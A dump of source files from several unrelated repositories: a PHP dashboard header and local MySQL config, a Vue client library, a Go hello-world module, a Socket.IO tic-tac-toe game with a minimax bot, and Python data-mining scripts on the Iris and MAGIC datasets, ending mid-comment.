<!-- END MOBILE HEADER -->
<!-- BEGIN LOGO -->
<a href="#">
<img src="<?php echo $rootsite; ?>assets/img/logo.png" class="logo" alt="" data-src="<?php echo $rootsite; ?>assets/img/logo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/logo2x.png" width="106" height="21"/>
</a>
<!-- END LOGO -->
<!-- BEGIN LOGO NAV BUTTONS -->
<ul class="nav pull-right notifcation-center">
<li class="dropdown" id="header_task_bar">
<a href="#" class="dropdown-toggle active" data-toggle="">
<div class="iconset top-home"></div>
</a>
</li>
<li class="dropdown" id="header_inbox_bar">
<a href="#" class="dropdown-toggle">
<div class="iconset top-messages"></div>
<span class="badge" id="msgs-badge">2</span>
</a>
</li>
<!-- BEGIN MOBILE CHAT TOGGLER -->
<li class="dropdown" id="portrait-chat-toggler" style="display:none">
<a href="#sidr" class="chat-menu-toggle">
<div class="iconset top-chat-white"></div>
</a>
</li>
<!-- END MOBILE CHAT TOGGLER -->
</ul>
<!-- END LOGO NAV BUTTONS -->
</div>
<!-- END NAVIGATION HEADER -->
<!-- BEGIN CONTENT HEADER -->
<div class="header-quick-nav">
<!-- BEGIN HEADER LEFT SIDE SECTION -->
<div class="pull-left">
<!-- BEGIN SLIM NAVIGATION TOGGLE -->
<ul class="nav quick-section">
<li class="quicklinks">
<a href="#" class="" id="layout-condensed-toggle">
<div class="iconset top-menu-toggle-dark"></div>
</a>
</li>
</ul>
<!-- END SLIM NAVIGATION TOGGLE -->
<!-- BEGIN HEADER QUICK LINKS -->
<ul class="nav quick-section">
<li class="quicklinks"><a href="#" class=""><div class="iconset top-reload"></div></a></li>
<li class="quicklinks"><span class="h-seperate"></span></li>
<li class="quicklinks"><a href="#" class=""><div class="iconset top-tiles"></div></a></li>
<!-- BEGIN SEARCH BOX -->
<li class="m-r-10 input-prepend inside search-form no-boarder">
<span class="add-on"><span class="iconset top-search"></span></span>
<input name="" type="text" class="no-boarder" placeholder="Search Dashboard" style="width:250px;">
</li>
<!-- END SEARCH BOX -->
</ul>
<!-- BEGIN HEADER QUICK LINKS -->
</div>
<!-- END HEADER LEFT SIDE SECTION -->
<!-- BEGIN HEADER RIGHT SIDE SECTION -->
<div class="pull-right">
<div class="chat-toggler">
<!-- BEGIN NOTIFICATION CENTER -->
<a href="#" class="dropdown-toggle" id="my-task-list" data-placement="bottom" data-content="" data-toggle="dropdown" data-original-title="Notifications">
<div class="user-details">
<div class="username">
<!-- <span class="badge badge-important">3</span> --> <?php echo $donnees_login['prenom']; ?><span class="bold"> <?php echo $donnees_login['nom']; ?></span>
</div>
</div>
<div class="iconset top-down-arrow"></div>
</a>
<div id="notification-list" style="display:none">
<div style="width:300px">
<!-- BEGIN NOTIFICATION MESSAGE -->
<div class="notification-messages info">
<div class="user-profile">
<img src="<?php echo $rootsite; ?>assets/img/profiles/d.jpg" alt="" data-src="<?php echo $rootsite; ?>assets/img/profiles/d.jpg" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/d2x.jpg" width="35" height="35">
</div>
<div class="message-wrapper">
<div class="heading">Nouvelle Version de GESTCO annoncé</div>
<div class="description">La version 2.0.0 de GESTCO est annoncé pour le 15 Avril 2014</div>
<div class="date pull-left">Il y a une minute</div>
</div>
<div class="clearfix"></div>
</div>
<!-- END NOTIFICATION MESSAGE -->
</div>
</div>
<!-- END NOTIFICATION CENTER -->
<!-- BEGIN PROFILE PICTURE -->
<div class="profile-pic">
<img src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" alt="" data-src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" width="35" height="35" />
</div>
<!-- END PROFILE PICTURE -->
</div>
<!-- BEGIN HEADER NAV BUTTONS -->
<ul class="nav quick-section">
<!-- BEGIN SETTINGS -->
<li class="quicklinks">
<a data-toggle="dropdown" class="dropdown-toggle pull-right" href="#" id="user-options">
<div class="iconset top-settings-dark"></div>
</a>
<ul class="dropdown-menu pull-right" role="menu" aria-labelledby="user-options">
<li><a href="<?php echo $rootsite; ?>core/user/user-profile.php">Gestion Utilisateur</a></li>
<li class="divider"></li>
<li><a href="logout.php"><i class="fa fa-power-off"></i> Déconnexion</a></li>
</ul>
</li>
<!-- END SETTINGS -->
</ul>
<!-- END HEADER NAV BUTTONS -->
</div>
<!-- END HEADER RIGHT SIDE SECTION -->
</div>
<!-- END CONTENT HEADER -->
</div>
<!-- END TOP NAVIGATION BAR -->
</div>
<!-- END HEADER --><file_sep><?php
//mysql
$host = "localhost";
$user = "root";
$pass = "";
$base = "gestion";
mysql_connect($host,$user,$pass);
mysql_select_db($base);
$rootsite = "http://127.0.0.1/GCO/";
// Date formatting
date_default_timezone_set('UTC');
$date = date("d-m-Y");
$date_mois = date("m");
$date_mois_deb = date("01-m-Y");
$date_mois_fin = date("t-m-Y"); // "t" = number of days in the current month (avoids the hard-coded year and "31")
//Server
$sql_server = mysql_query("SELECT * FROM server");
$donnee_server = mysql_fetch_array($sql_server);
$error = mysql_error();
?>
[repo metadata] jbabinot/GCO | languages: Markdown, PHP | 29 files | branch: refs/heads/master
<file_sep>import LidFormModel from './lid-form-model';
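
// Repost variant of the lead form; adds two flags on top of the base model
// (semantics assumed from the field names: "vu" = viewed, "certificate" = has a certificate).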
export default class LidFormRepostModel extends LidFormModel {
constructor(obj = {}){
super(obj);
this.vu = obj.vu || false;
this.certificate = obj.certificate || false;
}
}<file_sep>export default {
siteId: undefined,
commentsDefault: ''
}<file_sep>import PhoneNumber from './PhoneNumber.vue';
export const PhoneNumberCtrl = PhoneNumber;<file_sep>import LidForm from './lid-form-model';
import LidFormRepost from './lid-form-repost-model';
import AuthForm from './auth-form-model';
import Calculator from './calculator-model';
export const LidFormModel = LidForm;
export const LidFormRepostModel = LidFormRepost;
export const AuthFormModel = AuthForm;
export const CalculatorModel = Calculator;<file_sep>export default class Api {
constructor(config = {}){
this._siteId = config.siteId
this._host = process.env.NODE_ENV === 'production' ? 'https://dswp.ru/api/' : 'http://localhost:3000/api/'
}
getUrl(str){
return this._host + this._siteId + '/' + str
}
get(method){
return new Promise((resolve, reject) => {
const url = this.getUrl(method)
const request = new Request(url, {
method:'get',
headers: new Headers({
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest'
})
})
fetch(request).then((response) => {
return response.json()
}).then(data => {
resolve(data)
}).catch(error => {
console.log(error)
reject(error)
})
})
}
post(method, data){
return new Promise((resolve, reject) => {
const url = this.getUrl(method)
const request = new Request(url, {
method:'post',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json',
},
body: JSON.stringify(data)
});
fetch(request).then((response) => {
return response.json()
}).then(data => {
resolve(data)
}).catch(error => {
console.log('err')
console.log(error)
reject(error)
})
})
}
}<file_sep>const path = require('path');
const VueLoaderPlugin = require('vue-loader/lib/plugin');
const ExtractTextPlugin = require("extract-text-webpack-plugin");
module.exports = {
entry: {
'ds-web-platform-client': [
'./src/assets/stylus/common.styl',
'./src/index.js'
],
'theme-svetofor': [
'./src/assets/stylus/theme-svetofor.styl'
]
},
output: {
publicPath: '/dist/',
path: path.resolve(__dirname, 'dist'),
chunkFilename: '[name].js',
library: 'dswpClient',
libraryTarget: 'umd',
umdNamedDefine: true
},
devServer: {
contentBase: path.join(__dirname, 'docs'),
compress: true,
port: 9000
},
plugins: [
new VueLoaderPlugin(),
new ExtractTextPlugin({
filename: '[name].css'
})
],
module: {
rules: [
{
test: /\.vue$/,
use: 'vue-loader'
},
{
test: /\.pug$/,
use: 'pug-plain-loader'
},
{
test: /\.css$/,
use: ExtractTextPlugin.extract({
fallback: 'style-loader',
use: ['css-loader']
})
},
{
test: /\.styl(us)?$/,
use: ExtractTextPlugin.extract({
fallback: 'vue-style-loader',
use: ['css-loader', 'stylus-loader']
})
},
{
test: /\.(png|jpg|gif)$/,
loader: 'file-loader',
options: {
outputPath: 'images',
}
},
{
test: /\.(svg)$/,
loader: 'file-loader',
options: {
outputPath: 'svg',
name: '[name].[ext]'
}
}
]
}
};<file_sep>import configuration from './config'
import Api from './api'
import * as uiComponents from './ui'
import * as uiControls from './ui/controls'
import * as uiTemplates from './ui/templates'
import * as libHelpers from './helpers'
import * as libModels from './models'
import themesArr from './themes'
import moment from 'moment'
export const init = async (params) => {
moment.locale('ru')
if(process.env.NODE_ENV !== 'production'){
console.log('Init (ds-web-platform-client)')
}
config.siteId = params.siteId || undefined
config.commentsDefault = params.commentsDefault || ''
if(window && window.location && window.location.href){
libHelpers.utmHelper.setUtem(window.location.href)
}
return config
}
export const api = (config = configuration) => {
return new Api(config)
}
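
// Usage sketch (endpoint name is illustrative, not this API's real route):
//   api().get('groups').then(console.log)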
export const config = configuration
export const ui = uiComponents
export const uiCtrls = uiControls
export const uiTpls = uiTemplates
export const helpers = libHelpers
export const models = libModels
export const themes = themesArr<file_sep>export default class CalculatorModel {
constructor(){
this.selected = {
category: 'category-b',
package: undefined,
packageAdditional: undefined,
akpp: false,
group: undefined
};
}
}<file_sep>import LidForm from './LidFormUi.vue';
import AuthForm from './AuthFormUi.vue';
import Calculator from './CalculatorUi.vue';
import GroupTables from './GroupTablesUi.vue';
import GroupList from './GroupListUi.vue';
import SliderSwiper from './SliderSwiperUi.vue';
import Counters from './CountersUi.vue';
import Instructors from './InstructorsUi.vue';
import Reviews from './ReviewsUi.vue';
export const LidFormUi = LidForm;
export const AuthFormUi = AuthForm;
export const CalculatorUi = Calculator;
export const GroupTablesUi = GroupTables;
export const GroupListUi = GroupList;
export const SliderSwiperUi = SliderSwiper;
export const CountersUi = Counters;
export const InstructorsUi = Instructors;
export const ReviewsUi = Reviews;
[repo metadata] AntoXaPRO/ds-web-platform-client | language: JavaScript | 9 files | branch: refs/heads/master
<repo_name>wahyu6070/kopigo<file_sep>/kopigo.go
package kopigo
import (
"fmt"
)
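
// hello prints a placeholder greeting to stdout.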
func hello() {
fmt.Println("hello world")
}
<file_sep>/go.mod
module github.com/wahyu6070/kopigo
go 1.13
[repo metadata] wahyu6070/kopigo | languages: Go Module, Go | 2 files | branch: refs/heads/main
<repo_name>GoncaloNevesCorreia/tic-tac-toe<file_sep>/README.md
# Tic Tac Toe With Socket.IO
This project supports a real-time connection between two players with Socket.IO, plus a chat room and user sessions.
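
A minimal sketch of the real-time wiring this relies on (illustrative only: the port, event names, and handlers below are assumptions, not this project's actual API — the real wiring lives in the server and the `Client/js` modules):

```js
// Server side: relay game moves and chat messages between the two connected players.
const io = require('socket.io')(3000);

io.on('connection', (socket) => {
  socket.on('play', (move) => socket.broadcast.emit('play', move)); // forward a move
  socket.on('chat', (msg) => socket.broadcast.emit('chat', msg));   // forward a chat message
});

// Client side (browser, with /socket.io/socket.io.js loaded):
//   const socket = io('http://localhost:3000');
//   socket.emit('play', { x: 0, y: 1 });
//   socket.on('play', (move) => console.log('opponent played', move));
```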
<file_sep>/modules/user.js
const fs = require('fs');
class User {
constructor() {
this.users = [];
}
addUser(session_id, temp_session_id) {
const name = "player" + Math.round(Math.random() * 10000);
let user = { session_id, name, temp_session_id, online: false, gamesWon: 0 };
this.users.push(user);
this.updateDBWithMemory();
return user;
}
getUser(session_id) {
return this.users.filter((user) => user.session_id === session_id)[0];
}
removeUser(session_id) {
let user = this.getUser(session_id);
if (user) {
this.users = this.users.filter((user) => user.session_id !== session_id);
}
return user;
}
getUserByCurrent_Session_ID(temp_session_id) {
return this.users.filter((user) => user.temp_session_id === temp_session_id)[0];
};
changeName(userID, name) {
const user = this.getUser(userID);
user.name = name;
this.updateDBWithMemory();
}
updateUserScore(userID) {
const user = this.getUser(userID);
user.gamesWon++;
this.updateDBWithMemory();
}
updateDBWithMemory() {
let data = JSON.stringify(this.users, null, 2);
fs.writeFileSync('users.json', data);
}
syncWithUsersDB() {
fs.readFile('users.json', (err, data) => {
if (err) return;
let pasedData = JSON.parse(data);
this.users = pasedData;
let changes = false;
this.users.forEach(user => {
if (user.online) {
user.online = false;
changes = true;
}
});
if (changes) this.updateDBWithMemory();
})
}
getTopScores(limit) {
        // Sort a copy (Array.sort mutates in place) so the stored user order is untouched
        const temp_users_array = [...this.users];
        temp_users_array.sort((a, b) => b.gamesWon - a.gamesWon);
let response = [];
for (let i = 0; i < temp_users_array.length && i < limit; i++) {
let user = temp_users_array[i];
response.push({
name: user.name,
score: user.gamesWon
})
}
return response;
}
}
module.exports = { User };<file_sep>/Client/js/bot.js
class Bot {
constructor(symbol) {
this.symbol = symbol;
}
makePlay(Game) {
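        // Exhaustive minimax over the 3x3 board: the bot (player 2) maximizes the
        // score, the human (player 1) minimizes it; depth is used to prefer quick
        // wins and late losses when outcomes are otherwise equal.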
const minimax = (board, depth, isMaximizing) => {
let scores = { draw: 0 };
scores[Game.player1Symbol] = -10;
scores[Game.player2Symbol] = 10;
            let result = Game.checkGameState();
            if (result !== false) {
                if (result === Game.player1Symbol) { // Loss: prefer losing as late as possible
                    return scores[result] + depth;
                } else if (result === Game.player2Symbol) { // Win: prefer winning as early as possible
                    return scores[result] - depth;
                } else { // Draw
                    return scores[result];
                }
            }
if (isMaximizing) {
let bestScore = -Infinity; // Get the MAX
for (let x = 0; x < 3; x++) {
for (let y = 0; y < 3; y++) {
// Is the spot available?
if (board[x][y] == Game.untakenSpace) {
board[x][y] = Game.player2Symbol;
let score = minimax(board, depth + 1, false);
board[x][y] = Game.untakenSpace;
bestScore = Math.max(score, bestScore); // Maximizing player
}
}
}
return bestScore;
} else {
let bestScore = Infinity; // Get the MIN
for (let x = 0; x < 3; x++) {
for (let y = 0; y < 3; y++) {
// Is the spot available?
if (board[x][y] == Game.untakenSpace) {
board[x][y] = Game.player1Symbol;
let score = minimax(board, depth + 1, true);
board[x][y] = Game.untakenSpace;
bestScore = Math.min(score, bestScore); // Minimazing player
}
}
}
return bestScore;
}
}
// AI to make its turn
let bestScore = -Infinity;
let move;
for (let x = 0; x < 3; x++) {
for (let y = 0; y < 3; y++) {
// Is the spot available?
if (Game.board[x][y] == Game.untakenSpace) {
Game.board[x][y] = Game.player2Symbol;
let score = minimax(Game.board, 0, false);
Game.board[x][y] = Game.untakenSpace;
if (score > bestScore) {
bestScore = score;
move = { x, y };
}
}
}
}
setTimeout(() => {
Game.storePlay(move.x, move.y, this.symbol);
Game.renderPlays();
Game.hasWinner();
if (Game.isOver) return;
// Next turn
Game.nextTurn();
}, 1000);
}
}
export { Bot };<file_sep>/Client/js/board.js
class Board {
isSpaceUntaken(x, y, GameState) {
return (GameState.board[x][y] === GameState.untakenSpace)
}
isValidID(id) {
if (id !== "" && !isNaN(id) && id.length == 2) {
if (id[0] >= 0 && id[0] <= 2 && id[1] >= 0 && id[1] <= 2) {
return true;
}
}
return false;
}
getCords(event, GameState) {
const space = event.target;
const id = space.id;
if (this.isValidID(id) && this.isSpaceUntaken(id[0], id[1], GameState)) {
return { x: id[0], y: id[1] };
}
return;
}
renderPlays(GameState) {
for (let i = 0; i < GameState.board.length; i++) {
const row = GameState.board[i];
for (let k = 0; k < row.length; k++) {
const cell = row[k];
const spaceID = i.toString() + k.toString();
const space = document.getElementById(spaceID);
if (cell === GameState.playerSymbol) {
space.innerHTML = `<span class="play${GameState.playerSymbol}">${GameState.playerSymbol}</span>`;
} else if (cell === GameState.opponentSymbol) {
space.innerHTML = `<span class="play${GameState.opponentSymbol}">${GameState.opponentSymbol}</span>`;
} else if (cell === GameState.untakenSpace) {
space.innerHTML = '';
}
}
}
}
displaySymbol(symbol) {
const div_Your_Symbol = document.querySelector("div#yourSymbol");
div_Your_Symbol.innerHTML = `<span class="player${symbol}">You are ${symbol}</span>`;
}
displayTurn(GameState) {
const htmlBoard = document.querySelector(".board");
const div_current_turn = document.querySelector("div#gameInfo");
        const playerWithTurn = GameState.playerTurn ? 'your' : GameState.opponentSymbol + "'s";
const classTurn = GameState.playerTurn ? `player${GameState.playerSymbol}` : `player${GameState.opponentSymbol}`;
div_current_turn.innerHTML = `<span class="${classTurn}">It's ${playerWithTurn} turn!</span>`;
const hasClassName = htmlBoard.classList.contains("notYourTurn");
if (GameState.playerTurn && hasClassName) {
htmlBoard.classList.remove("notYourTurn");
} else if (!GameState.playerTurn && !hasClassName) {
htmlBoard.classList.add("notYourTurn");
}
}
hasWinner(GameState) {
if (GameState.isOver) {
const div_current_turn = document.querySelector("div#gameInfo");
const message = (GameState.winner === "draw") ? "The game ended in a draw." : (GameState.winner === GameState.playerSymbol) ? "<strong>YOU</strong> Win!" : `<strong>${GameState.winner}</strong> Wins!`;
const classWinner = (GameState.winner === GameState.playerSymbol) ? `player${GameState.playerSymbol}Winner` : (GameState.winner === "draw") ? "gameDraw" : `player${GameState.opponentSymbol}Winner`;
div_current_turn.innerHTML = `<span class="${classWinner}">${message}</span>`;
}
}
waitingForOponent() {
const div_game_info = document.querySelector("div#gameInfo");
const div_Your_Symbol = document.querySelector("div#yourSymbol");
div_game_info.innerHTML = "<span class='searching'>Finding a new opponent...</span>";
div_Your_Symbol.innerHTML = "";
}
opponentDisconnected() {
const div_game_info = document.querySelector("div#gameInfo");
const div_Your_Symbol = document.querySelector("div#yourSymbol");
const btnRestartGame = document.querySelector(".restartGame");
div_game_info.innerHTML = "<span class='disconnected'>The opponent has disconnected. :(</span>";
div_Your_Symbol.innerHTML = "";
btnRestartGame.textContent = "Find New Opponent";
}
}
export { Board };<file_sep>/modules/game.js
class CreateGame {
constructor(player1, player2ID, untakenSpace, playAgainstComputer) {
this.player = player1;
this.opponent = player2ID;
this.board = [
[untakenSpace, untakenSpace, untakenSpace],
[untakenSpace, untakenSpace, untakenSpace],
[untakenSpace, untakenSpace, untakenSpace]
];
this.isOver = false;
this.winner = null;
this.playerTurn = true;
this.untakenSpace = untakenSpace;
this.playerSymbol = 'X';
this.opponentSymbol = 'O';
this.playAgainstComputer = playAgainstComputer;
this.messages = [];
}
    // Validates board coordinates received from the client
isValidCords(x, y) {
if (!isNaN(x) && !isNaN(y) && (x >= 0 && x <= this.board.length - 1) && (y >= 0 && y <= this.board.length - 1)) {
if (this.isSpaceUntaken(x, y))
return true;
}
return false;
}
// Checks if the space is untaken
isSpaceUntaken(x, y) {
return (this.board[x][y] === this.untakenSpace)
}
// Stores play in board
storePlay(x, y, player) {
if (player) {
this.board[x][y] = this.playerSymbol;
} else {
this.board[x][y] = this.opponentSymbol;
}
this.nextTurn();
}
restartBoard() {
// Clear board Array
for (let i = 0; i < this.board.length; i++) {
this.board[i] = [this.untakenSpace, this.untakenSpace, this.untakenSpace];
}
// Restart Game Variables
this.isOver = false;
this.winner = null;
        // X always opens, so whoever currently holds the X symbol starts the rematch
        this.playerTurn = (this.playerSymbol === 'X');
}
checkGameState() {
const hasOpenSpaces = () => {
for (let i = 0; i < this.board.length; i++) {
for (let j = 0; j < this.board.length; j++) {
if (this.board[i][j] == this.untakenSpace) {
return true;
}
}
}
return false;
}
const equals3 = (a, b, c) => {
return a == b && b == c && a != this.untakenSpace;
}
for (let i = 0; i < this.board.length; i++) { // Check for winner in ROWS
if (equals3(this.board[i][0], this.board[i][1], this.board[i][2])) {
// Winner found in ROW
return this.board[i][0];
}
}
for (let i = 0; i < this.board.length; i++) { // Check for winner in COLUMN
if (equals3(this.board[0][i], this.board[1][i], this.board[2][i])) {
// Winner found in COLUMN
return this.board[0][i];
}
}
if (equals3(this.board[0][0], this.board[1][1], this.board[2][2])) { // Check winner in diagonal left to right
// Winner found in diagonal
return this.board[0][0];
}
if (equals3(this.board[0][2], this.board[1][1], this.board[2][0])) { // Check winner in diagonal right to left
// Winner found in diagonal
return this.board[0][2];
}
if (!hasOpenSpaces()) { // Check for DRAW
return 'draw';
}
return false;
}
nextTurn() {
this.playerTurn = !this.playerTurn;
}
hasWinner() {
const gameState = this.checkGameState();
if (gameState !== false) {
this.isOver = true;
this.winner = gameState;
}
}
playsFirst() {
this.playerSymbol = 'X';
this.opponentSymbol = 'O';
this.playerTurn = true;
}
playsSecond() {
this.playerSymbol = 'O';
this.opponentSymbol = 'X';
this.playerTurn = false;
}
storeMessage(message) {
this.messages.push(message);
}
}
module.exports = { CreateGame };<file_sep>/teste.js
const textArea = document.querySelector("#messageInput");
const btnSend = document.querySelector("#idBtnSendMessage");
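
// Manual stress test: floods the chat by filling the textarea and clicking "send" `limit` times.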
function sendSpam(text, limit) {
for (let i = 0; i < limit; i++) {
textArea.value = text;
btnSend.click();
}
}
[repo metadata] GoncaloNevesCorreia/tic-tac-toe | languages: Markdown, JavaScript | 6 files | branch: refs/heads/master
<file_sep>import numpy as np
import pandas as pd
import copy
import math
# For one attribute, find the split point with the highest information gain and return both
def splitpoint_gain(data, ii, Species):
data1 = copy.deepcopy(data)
data1 = data1[data1[:,ii].argsort()]
    splitpoint = []  # candidate split points
    species_num = []  # class counts to the left of each candidate split
L = len(data1)
n1 = 0
n2 = 0
n3 = 0
for i in range(L - 1):
if data1[i][4] == Species[0]:
n1 += 1
elif data1[i][4] == Species[1]:
n2 += 1
elif data1[i][4] == Species[2]:
n3 += 1
if data1[i][ii] != data1[i + 1][ii]:
point = (data1[i][ii] + data1[i+1][ii]) / 2
splitpoint.append(point)
nn = [n1, n2, n3]
species_num.append(nn)
num = count(data1,Species)
H = 0
for i in range(3):
if num[i]!=0:
H = H - (num[i]/ L) * math.log(num[i] / L,2)
bestpoint = []
gain = 0
for i in range(len(splitpoint)):
species_num1 = species_num[i][0]+species_num[i][1]+species_num[i][2]
species_num2 = L - species_num1
H1 = 0
H2 = 0
for j in range(3):
p1 = species_num[i][j] / species_num1
p2 = (num[j] - species_num[i][j]) / species_num2
if p1!=0:
H1 = H1 - p1 * math.log(p1, 2)
if p2!=0:
H2 = H2 - p2 * math.log(p2, 2)
gain1 = H - (species_num1 / L) * H1 - (species_num2 / L) * H2
if gain1 > gain:
gain = gain1
bestpoint = splitpoint[i]
return bestpoint, gain
# Pick the attribute whose best split yields the highest information gain
def best_attribute(data,Species):
    best_gain = 0
    attribute_num = 0
    best_splitpoint = None  # remains None if no split improves on zero gain
    for i in range(4):
        splitpoint, gain = splitpoint_gain(data, i, Species)
        if gain > best_gain:
            best_gain = gain
            attribute_num = i
            best_splitpoint = splitpoint
    return attribute_num,best_splitpoint,best_gain
# Count how many samples belong to each of the three classes
def count(data,Species):
num1=num2=num3=0
for i in range(len(data)):
if data[i][4] == Species[0]:
num1 = num1 + 1
elif data[i][4] == Species[1]:
num2 = num2 + 1
elif data[i][4] == Species[2]:
num3 = num3 + 1
num=[num1,num2,num3]
return num
# Partition the data on the chosen attribute and split point
def splitdata(data,attribute_num,best_splitpoint):
front = []
back = []
for j in range(len(data)):
if data[j][attribute_num] <= best_splitpoint:
front.append(data[j])
else:
back.append(data[j])
left = np.array(front)
right = np.array(back)
return left, right
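
# Recursive tree growth: emit a leaf when a node is small (<= min_size) or pure
# enough (>= min_purity); otherwise split on the best-gain attribute and recurse.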
def decisionTree(data, min_size, min_purity):
Species = ['setosa','versicolor','virginica']
size = len(data)
num = count(data,Species)
purity = max(num)/size
if size <= min_size or purity >= min_purity:
c = Species[np.argmax(num)]
print("该节点是叶子节点 多数属性:"+str(c)+",分类纯度:"+str(purity)+",节点大小:"+str(size))
print("---")
return
attribute_num, best_splitpoint, best_gain = best_attribute(data,Species)
attribute = ['Sepal_Length', 'Sepal_Width', 'Petal_Length','Petal_Width']
print("节点的分裂点:"+str(attribute[attribute_num])+" <= " + str(best_splitpoint)+" 信息增益:"+str(best_gain))
data_left, data_right = splitdata(data, attribute_num, best_splitpoint)
print("节点 "+str(attribute[attribute_num])+" <= " + str(best_splitpoint)+" 的左子树 Ture"+" :")
decisionTree(data_left, min_size, min_purity)
print("节点 "+str(attribute[attribute_num])+" <= " + str(best_splitpoint)+" 的右子树 False"+" :")
decisionTree(data_right, min_size, min_purity)
data = pd.read_csv('iris.txt',
header=None,
skiprows=1,
sep=" ",
usecols=[1,2,3,4,5])
data = np.array(data)
decisionTree(data,5,0.95)
<file_sep># coding=utf-8
import numpy as np
import matplotlib.pyplot as plt
import math
import copy
# Read the data
data = np.loadtxt("magic1.txt",
usecols=(0,1,2,3,4,5,6,7,8,9),
unpack=False,
skiprows=0,
delimiter=',')
np.set_printoptions(suppress = True)
m, n = data.shape
# Compute the multivariate mean vector
Mean=np.mean(data,0)
print("Multivariate mean vector:")
print(Mean)
print("------------------------------")
# Covariance matrix via inner products
data1 = copy.deepcopy(data)
print("Centered data:")
for i in range(0,n):
data1[:,i] = data1[:,i] - Mean[i]
print(data1)
data1T = data1.T
Inner = np.dot(data1T,data1)*(1/m)
print("协方差矩阵作为内积:")
print(Inner)
print("------------------------------")
# Covariance matrix via outer products
Outer = np.zeros((n,n))
for i in range(0,m):
Outer = Outer + np.outer(data1T[:,i],data1[i])
Outer = Outer/m
print("协方差矩阵作为外积:")
print(Outer)
print("------------------------------")
# Correlation between the first two attributes
print("Cosine of the angle between attribute 1 and attribute 2:")
cosine = np.dot(data1[:,0],data1[:,1])/(np.linalg.norm(data1[:,0])*np.linalg.norm(data1[:,1]))
print(cosine)
for i in range(m):
plt.plot(data[i, 0], data[i, 1], 'ok' )
plt.title("")
plt.xlabel("X1: fLength")
plt.ylabel("X2: fWidth")
plt.show()
print("------------------------------")
# Normal-distribution probability density for attribute 1
u=Mean[0]
o2 = np.var(data[:,0])
o = np.std(data[:,0],ddof=1)
x = np.linspace(u - 4*o, u + 4*o, 100)
y = np.exp(-(x - u) ** 2 /(2* o **2))/(math.sqrt(2*math.pi)*o)
plt.plot(x, y, "b-", linewidth=1)
plt.grid(True)
plt.title("normal distribution(μ="+ str(round(u,3))+",σ^2 ="+str(round(o2,3))+")")
plt.xlabel("X1: fLength")
plt.ylabel("X2: f(x1)")
plt.show()
# Largest and smallest variance
print("Variance of each attribute:")
variance = np.var(data,axis=0)
print(variance)
print("第"+str(int(np.argmax(variance))+1)+"个属性的方差最大,为:"+str(np.max(variance)))
print("第"+str(int(np.argmin(variance))+1)+"个属性的方差最小,为:"+str(np.min(variance)))
print("------------------------------")
# Largest and smallest covariance
a=data.T
covariance=np.cov(a)
print("协方差矩阵为:")
print(covariance)
u = np.triu(covariance,1) # strict upper-triangular part (excludes the diagonal)
m1, n1 = divmod(np.argmax(u), 10)
m2, n2 = divmod(np.argmin(u), 10)
print("第"+str(m1+1)+"个属性和第"+str(n1+1)+"个属性的协方差最大,为:"+str(np.max(u)))
print("第"+str(m2+1)+"个属性和第"+str(n2+1)+"个属性的协方差最小,为:"+str(np.min(u)))<file_sep>import numpy as np
data = np.loadtxt("iris.txt",
usecols=(1,2,3,4),
unpack=False,
skiprows=1,
delimiter=' ')
m, n = data.shape
k = np.zeros((m,m))
for i in range(m):
for j in range(m):
k[i,j] = (np.dot(data[i],data[j]))**2
print("齐次二次核矩阵:")
print(k)
print("______________________________")
print("------------------------------")
a = np.eye(m) - np.ones((m,m)) / m
k_center = np.dot(np.dot(a,k),a)
print("中心化后的核矩阵:")
print (k_center)
print("______________________________")
print("------------------------------")
b = np.zeros((m,m))
for i in range(m):
b[i,i] = 1 / (k[i,i]**0.5)
k_normalize = np.dot(np.dot(b,k),b)
print("标准化后的核矩阵:")
print(k_normalize)
print("______________________________")
print("------------------------------")
p_fs = np.zeros((m,10))
for i in range(m):
for j in range(n):
p_fs[i,j] = data[i,j]**2
for i1 in range(n-1):
for j1 in range(i1+1,n):
j = j + 1
p_fs[i,j] = 2**0.5 * data[i,i1] * data[i,j1]
print("变换到特征空间的点:")
print(p_fs)
print("______________________________")
print("------------------------------")
m1,n1 = p_fs.shape
p_center = np.zeros((m1,n1))
for i in range(n1):
p_center[:,i] = p_fs[:,i] - np.mean(p_fs[:,i])
print("特征空间点的中心化:")
print(p_center)
print("______________________________")
print("------------------------------")
p_normalize = np.zeros((m1,n1))
for i in range(m):
p_normalize[i] = p_fs[i] / np.linalg.norm(p_fs[i])
print("特征空间点的标准化")
print(p_normalize)
print("______________________________")
print("------------------------------")
k_center1 = np.zeros((m,m))
for i in range(m):
for j in range(m):
k_center1[i,j] = np.dot(p_center[i],p_center[j])
print("用中心化特征空间的点计算中心化核矩阵:")
print(k_center1)
print("______________________________")
print("------------------------------")
k_normalize1 = np.zeros((m,m))
for i in range(m):
for j in range(m):
k_normalize1[i,j] = np.dot(p_normalize[i],p_normalize[j])
print("用标准化特征空间的点计算标准化核矩阵:")
print(k_normalize1)
<file_sep># Python
Data mining exercises.
iris.txt is the Iris flower dataset
magic1.txt is the MAGIC gamma telescope dataset
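Each script loads its dataset from the working directory, so run the `.py` files from the folder that contains `iris.txt` and `magic1.txt`.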
<file_sep># coding=utf-8
import numpy as np
import math
import copy
def kernelize(x,y,h,degree):
kernel = np.exp(-(np.linalg.norm(x - y) / h) ** 2 / 2) / ((2. * np.pi) ** (degree/2))
return kernel
def density(x,data,h,degree):
m=0
for i in range(len(data)):
m = m + kernelize(x,data[i],h,degree)
d = m / (len(data) * h**degree)
return d
def den_arrive(x,y):
a=[]
b=[]
d = 0.3
if len(x)!=1 and len(x)!=0 :
for i in range(1,len(x)):
distance = math.sqrt((x[0][0]-x[i][0])**2+(x[0][1]-x[i][1])**2)
if distance <= d:
a.append(x[i])
else:
b.append(x[i])
a.append(x[0])
aa=copy.deepcopy(a)
bb=copy.deepcopy(b)
for i in range(len(aa)-1):
for j in range(len(bb)):
distance = math.sqrt((aa[i][0]-bb[j][0])**2+(aa[i][1]-bb[j][1])**2)
if distance <= d:
a.append(bb[j])
b.remove(bb[j])
elif len(x)==1:
a = x
elif len(x)==0:
return
y.append(a)
den_arrive(b,y)
return y
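# Hill climbing toward a density attractor: each step moves x to the kernel-weighted
# mean of all points,
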